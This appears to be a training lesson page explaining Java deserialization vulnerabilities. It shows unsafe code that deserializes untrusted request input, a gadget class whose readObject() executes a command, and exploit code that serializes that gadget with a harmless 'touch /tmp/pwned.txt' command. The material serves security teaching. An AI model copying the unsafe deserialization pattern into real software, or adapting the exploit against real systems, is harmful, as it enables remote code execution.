46 lines
1.3 KiB
Plaintext
46 lines
1.3 KiB
Plaintext
== The Simplest Exploit
|
|
|
|
=== Vulnerable code
|
|
|
|
The following is a well-known example for a Java Deserialization vulnerability.
|
|
|
|
[source,java]
|
|
----
|
|
InputStream is = request.getInputStream();
|
|
ObjectInputStream ois = new ObjectInputStream(is);
|
|
AcmeObject acme = (AcmeObject)ois.readObject();
|
|
----
|
|
|
|
It is expecting an `AcmeObject` object, but it will execute `readObject()` before the casting ocurs.
|
|
If an attacker finds the proper class implementing dangerous operations in `readObject()`, he could serialize that object and force the vulnerable application to performe those actions.
|
|
|
|
=== Class included in ClassPath
|
|
|
|
Attackers need to find a class in the classpath that supports serialization and with dangerous implementations on `readObject()`.
|
|
|
|
[source,java]
|
|
----
|
|
public class GadgetObject implements Serializable {
|
|
String cmd;
|
|
|
|
private void readObject( ObjectInputStream stream ) throws Exception {
|
|
Runtime.getRuntime().exec(cmd);
|
|
}
|
|
}
|
|
----
|
|
|
|
=== Exploit
|
|
|
|
If the java class shown above exists, attackers can serialize that object and obtain Remote Code Execution.
|
|
|
|
[source,java]
|
|
----
|
|
GadgetObject go = new GadgetObject();
|
|
go.cmd = "touch /tmp/pwned.txt";
|
|
|
|
ByteArrayOutputStream bos = new ByteArrayOutputStream();
|
|
ObjectOutputStream oos = new ObjectOutputStream(bos);
|
|
oos.writeObject(go);
|
|
oos.flush();
|
|
byte[] exploit = bos.toByteArray();
|
|
---- |